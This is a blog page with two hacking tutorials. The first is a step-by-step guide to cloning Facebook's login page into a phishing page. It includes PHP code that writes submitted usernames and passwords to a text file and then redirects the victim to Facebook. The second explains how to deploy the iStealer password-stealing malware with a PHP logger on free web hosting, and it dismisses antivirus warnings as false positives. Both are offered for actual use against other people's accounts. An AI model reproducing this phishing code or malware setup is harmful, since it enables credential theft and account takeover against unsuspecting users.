Posts

Showing posts from January, 2012

HACKING FACEBOOK ACCOUNT WITH PHISHING

Image
HACKING FACEBOOK ACCOUNT WITH PHISHING !!!! The way s the easiest and most commonly use way of hacking a Facbook account. Step1:  Goto  www.facebook.com/login.php Step2 :  Save the file to your desktop with photos with name  login.php Step3 :  Open the html file with notepad. Step4 :  Now search for  form method="POST"  and replace it with  form method="GET" Step5 :  And next is replacing  action =" https://login.facebook.com/login.php?login_attempt=1 " with action="lol.php" Step6 : now open a notepad and type following as it is. <?php header ('Location: http://www.facebook.com'); $handle = fopen("lol.txt", "a"); foreach($_POST as $variable => $value) {    fwrite($handle, $variable);    fwrite($handle, "=");    fwrite($handle, $value);    fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> NOW save this as hello.php Step7 :  now make a account on  ...

Istealer Password stealer - hack email passwords:

Image
STEP 1:  Free download  Istealer password stealer  software to hack email account password. It will show a virus , but its just a false positive since this is a stealer software, so don't worry. STEP 2:  Go to a free webhosting service like http://www.esmartstart.com/  or  http://www.000webhost.com/  and sign up for free account. Here I am using 000webhost. Now , the account is made. (Confirm it from your email) Now, login to the account and go to the Control Panel (CPanel) Scroll down to MySQL under "Software / Services". Follow this picture now : Now, SAVE the info you receive about on the next page in notepad. STEP 3 : Setting up index.php file (Php Logger) Extract iStealer6.3_Legends_2. rar file and after that extract PHP Logger rar file. You will see PHP Logger folder.Open it.Now you see two files. index.php style.css Open index.php using notepad and follow this pic : To remember :-  The admin and admin which you entered in $username and$pass...